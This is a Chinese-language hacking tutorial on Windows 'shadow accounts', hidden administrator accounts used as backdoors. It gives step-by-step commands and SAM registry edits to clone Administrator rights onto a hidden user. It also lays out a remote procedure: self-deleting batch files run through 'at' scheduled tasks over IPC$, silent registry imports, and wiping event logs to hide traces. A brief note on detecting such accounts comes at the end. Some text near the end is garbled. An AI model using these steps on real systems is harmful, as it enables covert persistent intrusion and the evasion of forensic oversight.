定义：影子账户，顾名思义就是隐藏的账户，在“控制面板-用户账户”里面是看不见，但却有管理员权限的账户

可行性：这一概念是随着windows系统产生的；在黑客技术里与后门安装技术挂钩；由于它的隐藏性强， 入侵者多在被入侵的电脑里加上这样的账户，用于远程登录以便控制客户机。影子账户的创建在windows98\\2000\\xp系统下是可以实施的，在windowsNT系统下理论上也应该可行，但是由于这类系统的安全机制不同于xp系统，加之该编者本人各方面的局限性，目前还不得知可否创建（以期高手补充）

账户的创建：

a.建立隐藏帐户

其实，制作系统隐藏账户并不是十分高深的技术，利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。

点击“开始”→“运行”，输入“CMD”运行“命令提示符”，输入“net user root2$ password /add”，回车，成功后会显示“命令成功完成”。接着输入“net localgroup administrators root2$ /add”回车，这样我们就利用“命令提示符”成功得建立了一个用户名为“root2$”，密码为“password”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。

进入控制面板的“管理工具”，打开其中的“计算机”，查看其中的“本地用户和组”，在“用户”一项中，我们建立的隐藏账户“root2$”暴露无疑。

因此这种方法只能将账户在“命令提示符”中进行隐藏，而对于“计算机管理”则无能为力。

b.彻底隐藏账户

1、给管理员注册表操作权限

点击“开始”→“运行”，输入“regedt32.exe”后回车（注意：不是regedit.exe)，定位到HKEY_LOCAL_MACHINE\\SAM\\SAM，点击右键，选择“权限”即可。在弹出的“SAM的权限”编辑窗口中选中“administrators”账户，在下方的权限设置处勾选“完全控制”，完成后点击“确定”。

2、将隐藏账户替换为管理员

点击“开始”→“运行”，输入“regedit.exe”后回车（注意：不是regedt32.exe)，定位到“HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\ames”处，点击新建的隐藏账户“root2$”，在右边显示的键值中的“类型”一项显示为0x3eb。

向上来到“HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\”处，将“root2$”的键值导出为root2$.reg，同时将“000003EB”和“000001F4”项的F键值分别导出为user.reg，admin.reg。用“记事本”打开admin.reg，将其中“F”值后面的内容复制下来，替换user.reg中的“F”值内容，完成后保存。

接下来进入“命令提示符”，输入“net user root2$ /del”将我们建立的隐藏账户删除。最后，将root2$.reg和user.reg导入注册表，至此，隐藏账户制作完成。

至此，你便看到用户，但注销用root2登陆，完全就可以登陆，而且桌面和administrator一样！

c.远程计算机上影子账户的建立

远程控制电脑创建影子帐户（后门）

步骤：

1、取得远程电脑的最高权限（管理员权限），要取得远程电脑管理员权限的方法很多，

难度视对方电脑的防备水平如何。如何取得权限，就不多介绍了。

2、利用各种工具，开启远程电脑的远程注册表、定时任务服务.server服务功能。

3、编写“添加管理员帐户”的DOS命令程序，也就是COM或BAT程序，程序要内含运行窗

口自动关闭和自我清除功能以便清除痕迹（俗称擦'屁股')。并上传这些文件到对方电脑上（隐藏在

不容易发现的角落即可）。

4、为了远程在对方电脑上运行这些DOS命令，现制作远程电脑的任务定时计划

（系统级别运行的），在本地DOS环境下输入如下命令：at \\\\xx.xx.xx.xx time

\\\\xx.xx.xx.xx\\DOS程

序的文件路径

5、可以通过如下命令测试远程添加帐户是否成功：

net use \\\\xx.xx.xx.xx\\ipc$ "密码" /user:"帐户名"，如果显示远程连接成功。则添加帐户成功！

6、退出已经连接的添加帐户：net use \\\\xx.xx.xx.xx\\ipc$ /del

7、运行本机电脑的regedt32.exe 程序，连接远程电脑xx.xx.xx.xx，给SAM注册表项设置

自己拥有的远程电脑的管理员权限为完全控制。退出regedt32程序。开启regedit.exe程序，

连接远程电脑注册表。在SAM下面的项中的,把目前已拥有的管理员帐户的F项键值复制到添

加的管理员帐户对应的F键值。

8、把远程电脑上的注册表上的新管理员帐户键值导出，可用如下命令：

at \\\\xx.xx.xx.xx time \\\\xx.xx.xx.xx\\admin$\\regedit.exe /e 注册表名.reg 要导出的注册表路径

9、制作删除刚添加的管理员帐户的DOS命令程序，并定时在远程电脑上运行。测试

,确保帐户删除成功

。

10、在远程电脑上导入刚才导出的注册表：

at \\\\xx.xx.xx.xx time \\\\xx.xx.xx.xx\\admin$\\regedit.exe /s 注册表名.reg (/S,静默方式导入）

11、将远程注册表上的SAM权限改为只保留系统级帐户修改的权限，。也就是还原原权限。

12、利用MT程序，在远程电脑上删除系统记录的日志。擦除掉一切显露你痕迹的尾巴。

记得做事要干净。

13、远程连接电脑，用建立的影子帐户登录。测试成功并查看远程电脑里的帐户里没有

显出帐户即可！

影子帐户相当于一个administrator帐户，密码administrator相同，当administrator密码变时

，影子帐户密码

不变，而帐户密码改变时administrator帐户密码跟着改变，常规方法看不到影子帐户，

只能到注册表去。建立影子帐户步骤如下： 定位 “HKEY_MACHNE\\SAM\\SAM\\Domains\\Account\\user\ames\\Administrator记住就行了)

保存双击导入注册表。《XXX为任意名》查找影子帐户办法：”打开注册表，定位到“HKEY_MACHNE\\SAM\\SAM\\Domains\\Account\\user\ames\\Administrator”查看默认值。2 “HKEY_MACHNE\\SAM\\SAM\\Domains\\Account\\user\ames”只要跟上边值相同就为影子帐户。（有时影子帐户不一定是Administrator的，也可能是普通帐户的